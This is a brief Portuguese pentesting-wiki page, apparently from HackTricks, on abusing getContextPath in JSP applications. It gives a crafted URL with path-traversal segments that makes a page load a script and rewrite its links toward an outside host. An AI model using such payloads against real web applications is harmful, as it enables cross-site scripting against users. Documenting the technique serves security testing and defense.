495 B

JSP

{{#include ../../banners/hacktricks-training.md}}

abuso de getContextPath

Informações de aqui.

http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp

Acessando esse site, você pode alterar todos os links para solicitar as informações para rakeshmane.com:

{{#include ../../banners/hacktricks-training.md}}